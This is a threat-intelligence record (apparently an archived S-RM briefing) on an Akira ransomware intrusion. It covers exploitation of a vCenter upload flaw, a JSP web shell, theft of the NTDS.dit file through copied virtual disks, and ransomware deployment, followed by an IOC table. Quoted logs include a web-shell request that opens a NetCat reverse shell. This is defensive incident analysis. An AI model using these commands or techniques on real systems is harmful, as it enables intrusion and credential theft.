{
	"id": "172ef0b8-83b4-4c3a-abbe-501739fd78e8",
	"created_at": "2026-04-06T00:17:56.270926Z",
	"updated_at": "2026-04-10T03:27:57.405311Z",
	"deleted_at": null,
	"sha1_hash": "2bbfdbe11c8ddf50083ed2a389bb6c3c1b4c41f8",
	"title": "Uncovering Akira's privilege escalation techniques",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 823390,
	"plain_text": "Uncovering Akira's privilege escalation techniques\r\nBy Callum Wilson\r\nPublished: 2024-05-14 · Archived: 2026-04-05 16:03:32 UTC\r\nIn this special Cyber Intelligence Briefing, our cyber experts at S-RM, Ineta Simkunaite and Callum Wilson,\r\nunravel a recent encounter with the Akira ransomware group. Their review unveils a novel privilege escalation\r\ntechnique used by attackers. This method leverages the victim’s virtual infrastructure to exfiltrate the NTDS.dit\r\nfile from domain controllers, paving the way for a swift attack.\r\nWho is Akira?\r\nSince emerging onto the cyber scene in March 2023, Akira has honed its sights on small to medium-sized\r\norganisations across North America, Europe, and Australia. The group's Tactics, Techniques and Procedures\r\n(TTPs) typically involve infiltrating target organisations via their VPNs, either by exploiting compromised\r\ncredentials or vulnerabilities within the VPN software.\r\nThe initial steps\r\nS-RM’s Incident Response team was called to a breach of a multinational agriculture company in early 2024\r\nwhere we identified the threat actor as Akira. We traced the initial intrusion to an unpatched single-factor VPN\r\nappliance, which served as a gateway into the network. Once connected via the VPN, the threat actor leveraged a\r\nremote code execution (RCE) vulnerability (CVE-2021-21972) in the VMware vCenter server.[1] This\r\nvulnerability affects the ‘uploadOVA’ function, allowing unauthenticated attackers to upload malicious files to the\r\nvulnerable ‘/ui/vropspluginui/rest/services/*’ endpoint. This enabled the threat actor to implant a reverse shell,\r\nproviding remote access to the vCenter server.\r\nThe snippet below depicts how Akira was able to install a malicious file named ‘healthcheck_beat.jsp’ on the\r\nvulnerable system, laying groundwork for their full-blown attack. We also found that they established a reverse\r\nshell connection with the IP address, which was assigned to the attacker’s device upon a successful VPN\r\nauthentication, using the command-line tool, NetCat.\r\n\"POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1\" 200 17\r\n\"GET /ui/resources/healthcheck_beat.jsp HTTP/1.1\" 200 179\r\n\"GET /ui/resources/healthcheck_beat.jsp?cmd=nc+[IP address]+-e+sh HTTP/1.1\" 200 212\r\nHaving gained access to the company’s vCenter, Akira proceeded to create a new virtual machine on a VMware\r\nESXi hypervisor. The fresh virtual machine gave Akira a nearly invisible playground from which to run their\r\noperations, evading detection from conventional Endpoint Detection and Response (EDR) tools.\r\nhttps://www.s-rminform.com/cyber-intelligence-briefing/uncovering-akira-privilege-escalation-techniques\r\nPage 1 of 5\n\nThe ESXi hypervisor hostd.log file showed the virtual machine (VM) creation event using the default vCenter\r\nadministrator account administrator@vsphere.local:\r\nhostd[2099736] [Originator@6876 sub=Vmsvc opID=[ID-HIDDEN]\r\nuser=vpxuser:VSPHERE.LOCAL\\Administrator] Create VM initiated [34]: /vmfs/volumes/5b436991-ec18bcd8-\r\n4657-246e96c59f00/New Virtual Machine/New Virtual Machine.vmx\r\nPrivilege escalation and gaining full control\r\nDespite acquiring local administrator privileges for the newly spawned VM, Akira sought elevated access for\r\nlateral movement across the target domain. Their approach involved extracting credentials from the NTDS.dit file,\r\nthe Active Directory database that resides on each domain controller and stores user account data including\r\npassword hashes. Due to its system protection, it can't be simply opened or copied by users. To further protect data\r\nwithin the database, it is encrypted using a key stored in the SYSTEM registry hive. Although various attacker\r\ntechniques exist to dump hashes from the NTDS.dit file, these typically require elevated privileges.\r\nTo circumvent the VMDK file's protections, Akira first temporarily powered down the domain controller's virtual\r\nmachine. Then, they copied the associated VMDK files to a separate directory and affixed these copied virtual\r\nhard drives to the newly created VM. By doing so, they were able to copy the NTDS.dit file and compress it using\r\n7-zip. Additionally, the threat actor was able to exfiltrate the SYSTEM hive, providing them with the decryption\r\nkey for the password hashes. Attackers would have then been able to crack the hashes or utilise ‘pass-the-hash'\r\nmethods for user authentication. By taking these novel series of steps to extract the NTDS.dit file, Akira was able\r\nto compromise a highly privileged domain administrator's account. Armed with these credentials, Akira navigated\r\nswiftly across the network, compromising additional user accounts, exfiltrating data and deploying the\r\nransomware — all in under 6 hours. See below for the attack chain:\r\nFigure 1: The attack chain identified by S-RM during its forensic investigation into the incident.\r\nhttps://www.s-rminform.com/cyber-intelligence-briefing/uncovering-akira-privilege-escalation-techniques\r\nPage 2 of 5\n\nSeizing opportunities: Exploiting legacy infrastructure for ransomware\r\ndeployment\r\nAkira deployed ransomware in two ways: via network shares and remote backup services. Specifically, the threat\r\nactor leveraged the legitimate Veritas Backup Exec Client process ‘beremote.exe’ to deploy a randomly generated\r\n8-character ransomware binary (for example ‘GkdrqaEP.exe’) to servers where the backup software was present.\r\nWhile exploiting network shares or installing remote services (such as using the PsExec[2] or DWagent[3] tools)\r\nfor ransomware deployment is a common practice among ransomware groups, leveraging remote backup tasks is\r\nsomewhat rare. This is generally because, upon gaining access to backup infrastructure, attackers often aim to\r\ndestroy it to hinder subsequent recovery efforts. However, in this scenario, it was not the primary backup solution,\r\nbut a legacy one, which was still present on a minor subset of devices. This backup service, already a part of the\r\norganisation’s ecosystem, likely served as a means to bypass security defences.\r\nFollowing the footsteps\r\nThe sophistication exhibited by Akira to evade detection, escalate privileges and laterally move, echoes the tactics\r\nof the China-backed threat actor group, UTA0178 (as documented by Volexity).[4] Notably, UTA0178 previously\r\nemployed a similar technique, leveraging virtual hard drive backups of domain controllers to extract the NTDS.dit\r\nfile. These parallels underscore the evolving complexity of ransomware-as-a-service threat actor groups.\r\nLessons learned\r\nThe Akira ransomware group's recent exploits serve as a stark reminder that attackers are constantly scanning for\r\nvulnerabilities to exploit and will invariably choose the path of least resistance. Their innovation and adaptability\r\nmean that no opportunity is left unexploited. Therefore, it's crucial to maintain updated security, both for the\r\nhttps://www.s-rminform.com/cyber-intelligence-briefing/uncovering-akira-privilege-escalation-techniques\r\nPage 3 of 5\n\nexternal perimeter and the in-network devices, by implementing regular security updates and a robust patch\r\nmanagement system. This practice not only aids in averting fast lateral movements across the environment but\r\nalso grants additional time to respond effectively. Other measures such as multi-factor authentication, consistent\r\npatching policy, and regular security assessments can go a long way in mitigating the risk of falling victim to\r\nransomware attacks like those orchestrated by Akira. Finally, for organisations and security professionals\r\ninterested in further malicious activities spotted during our investigation please see the Indicators of Compromise\r\n(IOC) table below. \r\nTable 1: Indicators of Compromise\r\nThe S-RM team identified the following IOCs during the investigation:\r\nHost-based IOCs \r\nIndicator name  Description   SHA1 \r\nakira_readme.txt  Ransom note   Hash was not retrievable \r\nanydesk.exe  \r\nRemote access and\r\nmanagement software \r\nHash was not retrievable \r\nfile.bat \r\nScript used to download\r\nRustDesk from Github, install\r\nit, create a service for\r\npersistence, and modify firewall\r\nrules to allow unrestricted\r\noutgoing and incoming\r\nRustDesk traffic \r\n6e7ad80da2f43af160dad06cd54805ee0ea1bd83 \r\nfile.e   Ransomware payload   Hash was not retrievable \r\nhealthcheck_beat.jsp \r\nJSP Shell, which allowed to run\r\ncommands on the compromised\r\nvCenter server  \r\nHash was not retrievable \r\nnetscan.exe  Network scanning tool   Hash was not retrievable \r\nhttps://www.s-rminform.com/cyber-intelligence-briefing/uncovering-akira-privilege-escalation-techniques\r\nPage 4 of 5\n\npGLkEvoo.exe  \r\nRandomly generated 8- \r\ncharacter ransomware binary  \r\nEach ransomware binary had a different hash \r\nrustdesk.exe \r\nRemote access and\r\nmanagement software  \r\n0f5f4ab3572e194340d887b02068357149b86ac2 \r\nw.exe  Ransomware binary   422613a3ef460dc829ae26f50a0e905adf28ba81 \r\nwinrar.exe  Data compression tool   151c8b4295630a71f2c1bed76326055100378b66 \r\nwinscp.exe  File transfer tool 078301fc29aa6ca907ad956145d62a4d67d1e917 \r\nNetwork-based IOCs \r\nIP address/domain  Description \r\nhttp[:]//repairdll[.]net/jHKIOEyC/  C2 domain\r\n[1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html\r\n[2] PsExec is a command-line tool that allows users to run programs on remote systems.\r\n[3] DWAgent is an open-source remote access and management software.\r\n[4] https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/\r\nPlease do not hesitate to reach out to S-RM if you have any questions on this threat intelligence or wider cyber\r\nsecurity concerns.\r\nSource: https://www.s-rminform.com/cyber-intelligence-briefing/uncovering-akira-privilege-escalation-techniques\r\nhttps://www.s-rminform.com/cyber-intelligence-briefing/uncovering-akira-privilege-escalation-techniques\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.s-rminform.com/cyber-intelligence-briefing/uncovering-akira-privilege-escalation-techniques"
	],
	"report_names": [
		"uncovering-akira-privilege-escalation-techniques"
	],
	"threat_actors": [
		{
			"id": "b2e48aa5-0dea-4145-a7e5-9a0f39d786d8",
			"created_at": "2024-01-18T02:02:34.643994Z",
			"updated_at": "2026-04-10T02:00:04.959645Z",
			"deleted_at": null,
			"main_name": "UNC5221",
			"aliases": [
				"UNC5221",
				"UTA0178"
			],
			"source_name": "ETDA:UNC5221",
			"tools": [
				"BRICKSTORM",
				"GIFTEDVISITOR",
				"GLASSTOKEN",
				"LIGHTWIRE",
				"PySoxy",
				"THINSPOOL",
				"WARPWIRE",
				"WIREFIRE",
				"ZIPLINE"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6ce34ba9-7321-4caa-87be-36fa99dfe9c9",
			"created_at": "2024-01-12T02:00:04.33082Z",
			"updated_at": "2026-04-10T02:00:03.517264Z",
			"deleted_at": null,
			"main_name": "UTA0178",
			"aliases": [
				"UNC5221",
				"Red Dev 61"
			],
			"source_name": "MISPGALAXY:UTA0178",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8c8fea8c-c957-4618-99ee-1e188f073a0e",
			"created_at": "2024-02-02T02:00:04.086766Z",
			"updated_at": "2026-04-10T02:00:03.563647Z",
			"deleted_at": null,
			"main_name": "Storm-1567",
			"aliases": [
				"Akira",
				"PUNK SPIDER",
				"GOLD SAHARA"
			],
			"source_name": "MISPGALAXY:Storm-1567",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84",
			"created_at": "2024-04-24T02:00:49.516358Z",
			"updated_at": "2026-04-10T02:00:05.309426Z",
			"deleted_at": null,
			"main_name": "Akira",
			"aliases": [
				"Akira",
				"GOLD SAHARA",
				"PUNK SPIDER",
				"Howling Scorpius"
			],
			"source_name": "MITRE:Akira",
			"tools": [
				"Mimikatz",
				"PsExec",
				"AdFind",
				"Akira _v2",
				"Akira",
				"Megazord",
				"LaZagne",
				"Rclone"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434676,
	"ts_updated_at": 1775791677,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2bbfdbe11c8ddf50083ed2a389bb6c3c1b4c41f8.pdf",
		"text": "https://archive.orkl.eu/2bbfdbe11c8ddf50083ed2a389bb6c3c1b4c41f8.txt",
		"img": "https://archive.orkl.eu/2bbfdbe11c8ddf50083ed2a389bb6c3c1b4c41f8.jpg"
	}
}